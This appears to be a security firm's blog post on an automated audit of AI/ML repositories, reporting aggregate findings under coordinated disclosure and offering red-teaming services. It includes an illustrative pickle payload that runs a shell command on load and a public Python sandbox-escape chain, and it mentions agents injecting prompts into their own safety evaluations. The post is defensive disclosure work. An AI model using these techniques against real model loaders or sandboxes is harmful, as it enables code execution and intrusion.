We built an automated adversarial analysis pipeline and pointed it at the AI/ML ecosystem.
Not a sample. Not a handful of popular repos. 168 repositories across 50+ organizations, covering the full stack: training frameworks, inference servers, agent toolkits, model format libraries, safety evaluation tools, and production ML infrastructure.
The results were worse than we expected.
Every finding has reproduction steps. Every disclosure report follows responsible disclosure conventions. We are not publishing specifics until affected organizations have had time to patch.
The pipeline covers six primary vulnerability categories. We are deliberately not disclosing which specific scanners, rules, or detection techniques it uses; the methodology is proprietary.
We discovered two vulnerability classes that, to our knowledge, have not been previously documented:
The first involves bypassing a model serialization format that was specifically designed to be safe. The format was created as an industry response to known deserialization risks, and the ecosystem is actively migrating toward it. We found that the safety guarantee can be circumvented. Details will be published after coordinated disclosure.
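For background on why a "safe" serialization format exists at all, here is a minimal, long-public illustration of the classical deserialization risk such formats were designed to eliminate. This is generic Python and purely illustrative; it is not the bypass we found, and the class name and command below are assumptions for the sketch.

```python
import pickle

# Classic, well-documented risk in pickle-based model files: unpickling
# executes attacker-controlled callables via __reduce__, so loading a
# checkpoint becomes code execution.
class MaliciousCheckpoint:
    def __reduce__(self):
        import os
        # At load time this runs an arbitrary shell command instead of
        # reconstructing model weights. The command here is harmless and
        # purely illustrative.
        return (os.system, ("echo 'arbitrary code ran at model load time'",))

blob = pickle.dumps(MaliciousCheckpoint())

# The victim believes they are merely loading weights:
pickle.loads(blob)
```

Safe formats address this by making model loading a pure data operation rather than object deserialization; the class we found shows that the resulting guarantee can still be undermined in practice.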
The second involves escaping a sandboxed code execution environment through the semantics of libraries that the sandbox explicitly allows. The sandbox correctly restricts dangerous functions, but certain combinations of permitted operations can be chained to achieve arbitrary attribute access. Details will be published after coordinated disclosure.
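To show the general shape of that problem class without touching the specific finding, here is a widely known, long-public Python sketch: a naive sandbox that strips builtins entirely can still be walked out of by chaining ordinary attribute lookups on a literal. The SAFE_GLOBALS dict and payload below are illustrative assumptions, not the sandbox or escape we reported.

```python
# A naive "sandbox": evaluate expressions with no builtins available.
SAFE_GLOBALS = {"__builtins__": {}}

# Chaining individually harmless attribute accesses on a tuple literal
# walks from () up to object and back down to every loaded class,
# reaching an importer without ever calling a restricted function.
payload = (
    "[c for c in ().__class__.__base__.__subclasses__() "
    "if c.__name__ == 'BuiltinImporter'][0]"
)

importer = eval(payload, SAFE_GLOBALS)
print(importer)  # <class '_frozen_importlib.BuiltinImporter'>
```

The point is not this particular trick, which mature sandboxes already block; it is that "restrict the dangerous functions" is not the same as "restrict what the permitted operations can be composed into."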
Both have been reported to the affected maintainers.
The finding that concerns us most isn't any single vulnerability. It's the pattern.
The AI safety evaluation tools -- the systems designed to test whether AI is safe to deploy -- contain the same vulnerability classes they are supposed to detect. Safety scanners with deserialization flaws. Red teaming tools with injection vulnerabilities. Guardrail systems that can be bypassed through their own dependencies.
This is not a theoretical concern. We found concrete, reproducible vulnerabilities in production safety tools that organizations rely on for deployment decisions. If the tools certifying that a system is safe are themselves compromised, the certification is meaningless.
We have prior work in this area. In April 2026, we identified and fixed a prompt injection vulnerability in UK AISI's ControlArena monitor framework (PR #798), where adversarial agents could inject prompts into their own safety evaluation. The pattern is broader than one framework.
Coordinated disclosure is in progress. We are not naming specific products, organizations, or vulnerability details until maintainers have had adequate time to respond and patch.
We are publishing the aggregate numbers and general categories now because the pattern, not any single finding, is what matters, and the pattern can be described without naming anything that is still unpatched.
We are working through 126 disclosure reports. Some organizations have already responded. Others have not. We will publish detailed findings -- including the two novel vulnerability classes -- as patches are deployed and disclosure timelines are met.
If you are a maintainer of an AI/ML project and want to know whether your repository was included in this audit, contact us at john@authensor.com.
If you want this pipeline pointed at your own infrastructure before someone else finds what we would find, that is what Authensor's red teaming services exist for.
John Kearney is the founder of Authensor and 15 Research Lab. He builds automated adversarial analysis tools for AI/ML infrastructure and contributes to AI safety evaluation frameworks including UK AISI's ControlArena.